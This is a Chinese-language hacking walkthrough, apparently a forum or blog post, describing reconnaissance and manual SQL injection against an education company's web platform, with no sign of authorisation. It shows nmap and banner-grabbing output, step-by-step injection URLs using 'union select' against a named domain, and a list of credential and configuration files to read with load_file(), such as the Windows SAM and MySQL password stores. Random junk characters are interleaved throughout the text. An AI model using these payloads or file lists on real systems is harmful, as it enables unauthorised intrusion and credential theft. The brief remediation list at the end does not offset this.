题记:
1 k; l% a( \* T( J# i0 c% N0 e一位朋友在某教育公司,一套网络教育平台。一年前,在2008年8月份的时候,我看到了这套平台,当时发现了个注入漏洞,测试了一下,得到一个可用帐户后就没有再继续下去。今天7月,又说到此事,我决定继续下去……
. N& @3 ^* e7 Y4 g9 R第一步:获取需要的信息) @4 ^. s6 i* {. o' C! n. v
由于之前测试过,知道此系统某处存在SQL注入漏洞。但由于时隔一年,岁月的远去已经深深的隐藏了那个SQL注入漏洞的地址,现在需要重新收集服务器有用信息。! Y2 T) g; u& h5 |" Y$ y2 j4 z2 y
注:以下为保护特用XXX代替敏感信息
# B ?" W9 m" B) a8 N; L) e顺手先PING了一下他们的域名:
4 r/ N( L& F. Rping XXX.XXX.XXX.XXX(本文约定:用XXX.XXX.XXX.XXX代表测试IP和域名): Z3 F0 h& T. T; n/ h
64 bytes from *********: icmp_seq=1 ttl=246 time=1.87 ms: |: |$ m( `* w! W8 {
顺便了解一下TTL,学好基础知识才能一路顺风:/ N7 } I4 f( R2 a
TTL:(Time To Live ) 生存时间
9 r7 r- \$ q% q4 D* x指定数据包被路由器丢弃之前允许通过的网段数量。
# _* I! l6 l1 K$ @TTL 是由发送主机设置的,以防止数据包不断在 IP 互联网络上永不终止地循环。转发 IP 数据包时,要求路由器至少将 TTL 减小 1。. n8 N! l+ I. Q
使用PING时涉及到的 ICMP 报文类型
! H6 x$ I h" l0 L2 O& m一个为ICMP请求回显(ICMP Echo Request) P4 I7 W$ @* s1 Y: v* S
一个为ICMP回显应答(ICMP Echo Reply)
. l: \% d% a' hTTL 字段值可以帮助我们识别操作系统类型。. T, e' Z# }" H# T' v
UNIX 及类 UNIX 操作系统 ICMP 回显应答的 TTL 字段值为 255) b+ }- G* u& B5 h+ f2 i6 g
Compaq Tru64 5.0 ICMP 回显应答的 TTL 字段值为 64
. U0 i) B7 u1 V( ]+ ~微软 Windows NT/2K操作系统 ICMP 回显应答的 TTL 字段值为 128
# ]& g6 L l" [) c4 A; y微软 Windows 95 操作系统 ICMP 回显应答的 TTL 字段值为 32* L4 e4 Y: o, [
当然,返回的TTL值是相同的7 L, d1 D2 V0 Z2 }! |! _4 j
但有些情况下有所特殊- [% ~4 ~( x# k, y& O. p4 s
LINUX Kernel 2.2.x & 2.4.x ICMP 回显应答的 TTL 字段值为 646 ^9 G0 _. ?* ^' k) B
FreeBSD 4.1, 4.0, 3.4;
$ V1 e3 Y5 o* b! g. ^Sun Solaris 2.5.1, 2.6, 2.7, 2.8;
: |, F+ U: C* S" s7 P9 SOpenBSD 2.6, 2.7,
! ~, H2 W* J5 mNetBSD
X; m; [9 h1 O2 cHP UX 10.206 [! |8 q4 O* R9 T8 g% `. g" s
ICMP 回显应答的 TTL 字段值为 255
; d9 J9 d7 |( }Windows 95/98/98SE+ Y o( K) v! l3 a) Q0 m! O
Windows ME
8 K6 z7 Y# I" M4 A( H4 l1 DICMP 回显应答的 TTL 字段值为 32
' M6 n, c! ~) V% jWindows NT4 WRKS2 N5 ?# U6 r7 e# C3 E; @9 T; M8 X- I
Windows NT4 Server; y/ A# u1 q8 r" f7 g* Q; ^
Windows 2000 H- t+ A. _5 G* l, {1 c9 w
Windows XP
% _2 ], q+ C( ^1 Z, V% a( K3 {. d NICMP 回显应答的 TTL 字段值为 128
. p" t% b$ [* Q7 p4 U+ h$ p这样,我们就可以通过这种方法来辨别操作系统2 D: m% c% n! Y& q; I4 [9 ?
TTL值的注册表位置HKEY_LOCAL_MACHINE\SYSTEM \CurrentControlSet\Services\Tcpip\Parameters 其中有个DefaultTTL的DWORD值,其数据就是默认的TTL值了,我们可以修改,但不能大于十进制的255& U5 S* X S0 m& W$ l- _
用NMAP扫描一下:$ w* _6 \) f% ~5 ~- p* n
nmap -sT -O XXX.XXX.XXX.XXX
- n4 o% f8 B1 V5 N9 V) B如果没有装WinPcap则会弹出提示:+ t7 |8 K, F, G
WARNING: Could not import all necessary WinPcap functions. You may need to upgr, d2 h/ B% U5 r8 V& @0 i
ade to version 3.1 or higher from http://www.winpcap.org. Resorting to connect(
4 x0 } i6 b5 c0 w+ Y) mode — Nmap may not function completely
7 U- ~/ V- l( E( HTCP/IP fingerprinting (for OS scan) requires that WinPcap version 3.1 or higher0 b: @0 t0 `3 k. t+ L
and iphlpapi.dll be installed. You seem to be missing one or both of these. Win
" n0 I$ E+ `) D" P1 wpcap is available from http://www.winpcap.org. iphlpapi.dll comes with Win98 an
6 W" Y" L. R/ @ N9 vd later operating sytems and NT 4.0 with SP4 or greater. For previous windows v
6 W; m. |9 J+ C4 Wersions, you may be able to take iphlpapi.dll from another system and place it i. y8 X% e" I$ W6 W9 J2 ?
n your system32 dir (e.g. c:\windows\system32)./ U7 B; T, {- o- ?9 b
QUITTING!* d3 @/ t7 L" ]9 M% J& y
到这里下载: http://www.winpcap.org/install/bin/WinPcap_4_1_1.exe4 f/ h2 \; h; \ C2 n
安装后继续执行刚才的命令,等待扫描完毕后得到入下信息:
" y) B2 d* }& wInteresting ports on XXX.XXX.XXX.XXX: O& g+ B; R1 |; t& z
Not shown: 986 closed ports
b/ T# b# h" |PORT STATE SERVICE
% |% g# @% D6 f21/tcp open ftp" @" {. v: `) W- u, I# T
22/tcp open ssh
! Y* x4 Z: _5 `! T+ J9 ?& s6 k23/tcp open telnet5 t; P) D# n |" b, `4 ~: N, ]
80/tcp open http
' U7 @; f# F! k" z1 Y* j( M$ h) J) G" w! S111/tcp open rpcbind' J0 w, Q- a% C) C! W) D
135/tcp filtered msrpc
8 b( c6 U5 ? b" N) }139/tcp filtered netbios-ssn1 \1 u5 a i& m n) E7 ]3 k o- b, V
445/tcp filtered microsoft-ds
# R! c1 r1 G* c$ }0 h3 o* E513/tcp open login
' K4 l* i0 ]- w! T514/tcp open shell8 W) v5 x8 F6 m% c
593/tcp filtered http-rpc-epmap. E& y9 n/ p& `2 S
1720/tcp filtered H.323/Q.931
3 \: n5 u0 A8 D5 Q. p2 _3306/tcp open mysql
8 A! s* [7 R) B) M8 `4444/tcp filtered krb5242 p) G( R; J' k+ V" S: m
Device type: WAP _' k9 t+ c9 c, _; a$ v# C7 L
Running: Linux 2.4.X/ p4 C! _( r% k
OS details: DD-WRT (Linux 2.4.35s)2 J) f1 [" B8 p1 W- `" f. k
Network Distance: 13 hops
% y2 [% i7 G0 @看到SSH22端口是开着的,打开putty试一下,看是否可以正常连接:
% j) o7 d+ M% L. b# p. |0 Clogin as:( N# T2 U% M# A2 |, ^3 y8 d* R! Y; z
Telnet23端口也是开着的,用telnet 命令链接一下:; B; h$ D4 s5 h
telnet XXX.XXX.XXX.XXX% i+ Z. Y- x8 w
提示:
/ ], j, w9 {! l$ _2 _Red Hat Enterprise Linux Server release 5.2 (Tikanga)
5 j& k- X. u+ ~& w5 oKernel 2.6.18-92.el5PAE on an i6862 g8 U! m' ?+ H5 n
login:- D. ~1 A8 j: T4 K2 p
获取HTTP头信息:
r+ H- n- h2 w8 {" s* l, w8 @在本地执行如下PHP代码
+ v; i$ k; u* G8 z) z8 U7 y<?php
$ m* l, P" O3 B7 W3 U$url = ‘XXX.XXX.XXX.XXX’;
: {+ M% e, a& R+ K% nprint_r(get_headers($url));
( N! m- d* P1 ?% Qprint_r(get_headers($url, 1));
" E: O) f* f8 |' L" D: p?>9 |6 W, Y3 f! b& P7 o6 y* }5 y
将以上代码保存为PHP文件,执行:) O& [2 \/ q/ q4 I2 C, `; K
Array ( [0] => HTTP/1.1 200 OK [1] => Server: nginx/0.7.61 [2] => Date: Mon, 02 Nov 2009 09:06:48 GMT [3] => Content-Type: text/html; charset=gb2312,gbk,utf-8 [4] => Content-Length: 75 [5] => Last-Modified: Thu, 20 Aug 2009 19:35:37 GMT [6] => Connection: close [7] => Accept-Ranges: bytes ) Array ( [0] => HTTP/1.1 200 OK [Server] => nginx/0.7.61 [Date] => Mon, 02 Nov 2009 09:06:48 GMT [Content-Type] => text/html; charset=gb2312,gbk,utf-8 [Content-Length] => 75 [Last-Modified] => Thu, 20 Aug 2009 19:35:37 GMT [Connection] => close [Accept-Ranges] => bytes )+ I7 g f2 T: |& S# l1 a
现在可以得出结论:0 c. n- K5 N( J1 d
系统版本:Red Hat Enterprise Linux Server release 5.2 (Tikanga)
6 z' ]$ m$ N& |7 j% e! W# g内核版本:Kernel 2.6.18-92.el5PAE on an i686
1 Y2 C* f6 }% cWEB服务器版本:nginx/0.7.61
1 T+ a4 @& F* U+ v9 o第二步,开始测试寻找漏洞
/ g+ o) K& z3 {$ @分析是否存在注入漏洞,因为上次曾发现存在过,所以注入则是我们的首选。
$ o6 p0 i7 r- ^; h1、敏感地址:站内存在有类似:http://www.fovweb.com/XXX.php?id=123 这种地址,属动态传参的 h! u% u2 U0 K) J* L4 ]
2、测试方法:在地址后加 and 1=1 和 and 1=2 测试
+ |+ h+ R. O. {& f3 N7 khttp://www.fovweb.com/XXX.php?id=123 and 1=1 返回正常
n5 y _% o( A! I" Qhttp://www.fovweb.com/XXX.php?id=123 and 1=2 返回错误
8 {7 e4 ~% Q: ]+ s5 K! {恭喜,两次返回结果不同,则很有可能存在未过滤敏感字符而存在SQL注入漏洞,我们继续
. S1 c/ v/ E, z6 b6 C- C9 _1 z3、手工注入:
7 x! f+ f) M/ h' J注入也应该有个思路,不能随便碰运气,要记住入侵检测不是靠运气而走下去的,要靠的是清晰的思路、过硬的技术、很全的知识面。
+ A/ o# N$ T0 s& C. z( V3.1 猜测当前表字段数8 i4 j) T9 @5 h! p
http://www.fovweb.com/XXX.php?id=123 and 1=1 order by 10
: e! Y. G1 Q8 W2 G2 F, K$ Z此处猜测有个简单的算法,都是有技巧的吗,呵呵
# N/ K2 M S: \% _8 Y+ A1 Z! t2 L算法简单如下:
+ ~2 w$ ?& n( y T' J: t9 ~第一步:根据页面信息,大概估算一个数值,这个是要靠一定的经验了;
" R" M2 d; q/ m7 m% H0 K) A) K/ S第二步:取中算法,好比是10,如果返回错误,则取中间值5进行下一次猜测;3 j% t8 B% o1 z0 x) `3 n
需要注意:如果所选数值在字段数范围内即小于等于,则会(返回正常);如果所选数值在字段范围外即大于等于,则会(返回错误)。
$ n' ?6 ~+ z: _6 U! h以此来判断,是否过界,配合取中算法猜出字段数。9 `( t1 E: ~3 m+ j$ F/ q
举例:
7 l: x/ Y( ?; r, V9 a. E8 f- g! \" Thttp://www.fovweb.com/XXX.php?id=123 and 1=1 order by 3 返回正常, l/ @/ M9 A- W- v! Y _7 s
http://www.fovweb.com/XXX.php?id=123 and 1=1 order by 4 返回错误1 o9 Y3 Y, l) d# m5 |
此时3则为我们要找的字段数。" a/ a5 p& N- [
3.2 配合union联合查询字段在页面所位置
6 t5 D( Z+ d! f8 k2 L8 l3 V* W: G1 r我们已经知道了字段数为3,此时则可以做如下操作:0 \" F4 z: D# b, v' g$ ~, s
http://www.fovweb.com/XXX.php?id=123 and 1=2 union select 1,2,3: e1 Z5 N8 J9 K
0 R; b! E0 X- x; t4 w/ S8 H8 u
这样就可以测试到哪些字段在页面上有所显示了,如图:
) B8 [4 _( j1 \% g; l
' k. o2 [& x; J+ ^3 t3.3 查敏感信息
; o4 K. [. C% R' R这也是个思路问题,我们需要什么,其实到了这一步已经能做什么多事情了。! c+ l5 w! a3 C& O0 X! s
http://www.fovweb.com/XXX.php?id=123 and 1=2 union select 1,user(),database()
4 S3 M! v; U2 Z- j, ]3.3.1 先查数据库用户、数据库名,以备后用,如图:
- R9 N2 n( r6 ^+ b) W& a a1 z( B! o* y5 `+ g
得到数据库用户为root、数据库名为DBxx;
# t' x8 o+ C) {3 M2 I3.3.2 查配置文件
4 _4 {; N9 T3 D, E. q" }: d! L查配置文件,就是指查看系统敏感的文件,如web服务器配置文件等。# |+ Y5 @3 q5 L0 e
查看文件有一定的条件限制:
' Q. v6 A2 a" _6 k欲读取文件必须在服务器上
5 R7 }1 L y3 d2 G# ?: N! D必须指定文件完整的路径, H' ~8 [3 d! P, m. N
必须有权限读取并且文件必须完全可读% G6 \7 t/ }9 w# [5 ?7 }
欲读取文件必须小于 max_allowed_packet
6 V( a ~5 J! D9 d3 DMYSQL注入中,load_file()函数在获得webshell以及提权过程中起着十分重要的作用,常被用来读取各种配置文件。' [* Y' c2 G+ G* ^- T2 f
常用的一些:, W) M" Z- a0 q
/usr/local/app/apache2/conf/httpd.conf //apache2缺省配置文件
& G' ]- L, B5 Q/usr/local/apache2/conf/httpd.conf% T' R/ D1 l; }. B7 v* ?, g2 ?7 y
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置
4 k& J0 n) Z: V* Y. y1 V/usr/local/app/php5/lib/php.ini //PHP相关设置
* K- Y; e; m8 E" a* Q/ }/etc/sysconfig/iptables //从中得到防火墙规则策略) k. b% V" r+ j. V& ?" N
/etc/httpd/conf/httpd.conf // apache配置文件
7 c' B/ O" t" Z. a/etc/rsyncd.conf //同步程序配置文件9 V6 Y: ?% L# u$ y0 O& \
/etc/sysconfig/network-scripts/ifcfg-eth0 //查看IP.
/ s3 g) B" r+ h2 W/etc/my.cnf //mysql的配置文件
4 k& o; |1 Y0 M, @0 Y/etc/redhat-release //系统版本
1 o" l. f2 e2 B1 U1 g/etc/issue X E6 l+ F( U2 p, G. q$ V
/etc/issue.net
' w' T; O: U# n6 h( o8 @0 dc:\mysql\data\mysql\user.MYD //存储了mysql.user表中的数据库连接密码8 m& i8 a( w# a, @- W4 e
c:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini //存储了虚拟主机网站路径和密码( }) J) `* K8 K* P2 C
c:\Program Files\Serv-U\ServUDaemon.ini; C% D- g2 I- N
c:\windows\my.ini //MYSQL配置文件
2 N. C+ V! e- s) _4 D0 r" ?- {c:\windows\system32\inetsrv\MetaBase.xml //IIS配置文件
' b6 X. ^# u0 y等等。实际上,load_file()的作用不止于此,它还可以用来读取系统中的二进制文件,0 D1 B7 Q: T* } h0 F! e" f; G
c:\windows\repair\sam //存储了WINDOWS系统初次安装的密码
+ W2 J; E% h, O0 W* h2 Vc:\Program Files\ Serv-U\ServUAdmin.exe //6.0版本以前的serv-u管理员密码存储于此
* q4 U! _ d8 x+ o B9 sc:\Program Files\RhinoSoft.com\ServUDaemon.exe
. ^3 n2 `; E2 p a3 h% O3 [$ xC:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\*.cif文件; v. I2 D. d0 U% K5 P7 g# R' a
//存储了pcAnywhere的登陆密码
, x- C& ]( O0 K. g c* f! t8 p由于之前得到信息,此台服务器是采用的nginx做的Web服务器,那我们就来试着找一下nginx的安装路径吧。
1 F) m _5 ~0 \3 `5 \9 T这个没有技术性可言,纯靠经验和运气,由于很少用nginx不了解,我就先到网上搜索常用的安装路径,以及比较好的配置文档中的安装路径进行测试,最终,得到nginx安装路径“/usr/local/nginx/conf/nginx.conf”。
: {/ \% p' ?4 J- }5 j, x5 @$ U6 a; u最后:防范措施6 h {# p+ j6 `
1、修复PHP注入漏洞;7 q8 x$ p/ R& v+ r
2、Mysql使用普通权限的用户;0 y5 O. I) r5 C& r
3、升级linux内核至最新版本; |